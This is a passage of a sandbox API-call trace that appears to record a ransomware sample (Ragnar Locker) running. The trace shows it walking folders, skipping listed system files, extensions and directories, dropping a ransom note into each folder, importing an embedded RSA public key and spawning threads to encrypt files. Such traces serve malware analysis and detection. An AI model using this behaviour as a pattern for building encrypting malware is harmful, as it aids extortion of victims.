ftCreationTime.dwLowDateTime=0xf5d92130, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf5d92130, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.350] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.350] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0175.350] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0175.350] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0175.350] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.350] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.350] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0175.350] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned=".rtf" [0175.350] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.350] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0175.351] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0175.351] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0175.351] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0175.351] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0175.351] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0175.351] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0175.351] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0175.351] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0175.351] GetProcessHeap () returned 0x3520000 [0175.351] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0175.352] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" [0175.352] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.352] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.352] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0175.353] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned=".xml" [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0175.353] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0175.353] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0175.353] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0175.353] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0175.353] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0175.353] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0175.353] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0175.353] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0175.353] GetProcessHeap () returned 0x3520000 [0175.353] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0175.354] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" [0175.354] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.354] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.354] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0175.355] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned=".dll" [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0175.355] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0175.355] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0175.355] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0175.355] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0175.355] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.355] GetProcessHeap () returned 0x3520000 [0175.355] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586900 [0175.355] CryptAcquireContextW (in: phProv=0x3586900, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586900*=0x3556660) returned 1 [0175.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0175.356] GetProcessHeap () returned 0x3520000 [0175.356] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358e748 [0175.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358e748, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0175.356] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.356] GetProcessHeap () returned 0x3520000 [0175.356] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0175.356] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.356] GetProcessHeap () returned 0x3520000 [0175.356] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358e748 | out: hHeap=0x3520000) returned 1 [0175.356] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0175.356] CryptImportPublicKeyInfo (in: hCryptProv=0x3556660, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586904 | out: phKey=0x3586904*=0x3547f00) returned 1 [0175.356] GetProcessHeap () returned 0x3520000 [0175.356] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0175.356] LocalFree (hMem=0x35948f0) returned 0x0 [0175.356] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d25310) returned 1 [0175.357] CryptGenRandom (in: hProv=0x5d25310, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0175.357] CryptReleaseContext (hProv=0x5d25310, dwFlags=0x0) returned 1 [0175.357] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.360] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d260e0) returned 1 [0175.360] CryptGenRandom (in: hProv=0x5d260e0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.360] CryptReleaseContext (hProv=0x5d260e0, dwFlags=0x0) returned 1 [0175.360] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.363] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d25860) returned 1 [0175.364] CryptGenRandom (in: hProv=0x5d25860, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0175.364] CryptReleaseContext (hProv=0x5d25860, dwFlags=0x0) returned 1 [0175.364] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.366] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26b80) returned 1 [0175.366] CryptGenRandom (in: hProv=0x5d26b80, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.366] CryptReleaseContext (hProv=0x5d26b80, dwFlags=0x0) returned 1 [0175.366] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.388] CryptEncrypt (in: hKey=0x3547f00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.389] GetLastError () returned 0x80090016 [0175.389] CryptEncrypt (in: hKey=0x3547f00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.390] GetLastError () returned 0x80090016 [0175.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xf50) returned 0x3b4 [0175.390] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x5d25f48) returned 1 [0175.391] CryptGenRandom (in: hProv=0x5d25f48, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0175.391] CryptReleaseContext (hProv=0x5d25f48, dwFlags=0x0) returned 1 [0175.391] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.393] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x5d26fc0) returned 1 [0175.393] CryptGenRandom (in: hProv=0x5d26fc0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.393] CryptReleaseContext (hProv=0x5d26fc0, dwFlags=0x0) returned 1 [0175.393] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.395] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x5d25d28) returned 1 [0175.396] CryptGenRandom (in: hProv=0x5d25d28, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0175.396] CryptReleaseContext (hProv=0x5d25d28, dwFlags=0x0) returned 1 [0175.396] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.398] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x5d26168) returned 1 [0175.398] CryptGenRandom (in: hProv=0x5d26168, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.398] CryptReleaseContext (hProv=0x5d26168, dwFlags=0x0) returned 1 [0175.398] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.400] CryptEncrypt (in: hKey=0x3547f00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.400] GetLastError () returned 0x80090016 [0175.400] CryptEncrypt (in: hKey=0x3547f00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.401] GetLastError () returned 0x80090016 [0175.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x1264) returned 0x3f0 [0175.401] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0175.527] GetProcessHeap () returned 0x3520000 [0175.527] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586900 | out: hHeap=0x3520000) returned 1 [0175.527] CloseHandle (hObject=0x3b4) returned 1 [0175.528] GetProcessHeap () returned 0x3520000 [0175.528] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0175.529] CloseHandle (hObject=0x3f0) returned 1 [0175.529] GetProcessHeap () returned 0x3520000 [0175.529] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0175.529] FindClose (in: hFindFile=0x3548240 | out: hFindFile=0x3548240) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1045", cAlternateFileName="")) returned 1 [0175.530] lstrcmpiW (lpString1="1045", lpString2=".") returned 1 [0175.530] lstrcmpiW (lpString1="1045", lpString2="..") returned 1 [0175.530] lstrcmpiW (lpString1="1045", lpString2="Windows") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Windows.old") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Tor browser") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Internet Explorer") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Google") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Opera") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Opera Software") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Mozilla") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="Mozilla Firefox") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="$Recycle.Bin") returned 1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="ProgramData") returned -1 [0175.531] lstrcmpiW (lpString1="1045", lpString2="All Users") returned -1 [0175.531] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0175.531] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1045" | out: lpString1="1045") returned="1045" [0175.531] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\" [0175.531] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1045\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\" [0175.531] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\!$R4GN4R_B8CF767A$!.txt" [0175.531] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1045\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0175.542] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*" [0175.542] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.542] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.542] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.542] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f80 [0175.542] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0175.542] FindNextFileW (in: 